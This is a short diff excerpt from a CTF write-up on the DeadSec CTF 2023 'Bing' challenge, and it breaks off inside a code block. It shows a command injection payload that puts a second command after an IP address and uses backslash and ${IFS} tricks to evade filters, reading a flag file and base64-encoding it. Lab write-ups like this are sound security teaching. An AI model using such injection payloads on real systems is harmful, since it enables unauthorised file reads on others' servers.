daffainfo/ctf-writeup/DeadSec CTF 2023/Bing/README.md

 ![preview_2](images/preview_2.png)

 ## How to Solve?
 We need to exploit the website using `Command Injection` vulnerability in order to read the flag.
-Here is the payload that I used to read the flag
+Here is the payload I used to read the flag

 ```
 127.0.0.1;c\a\t${IFS}/f\lag.txt${IFS}|base64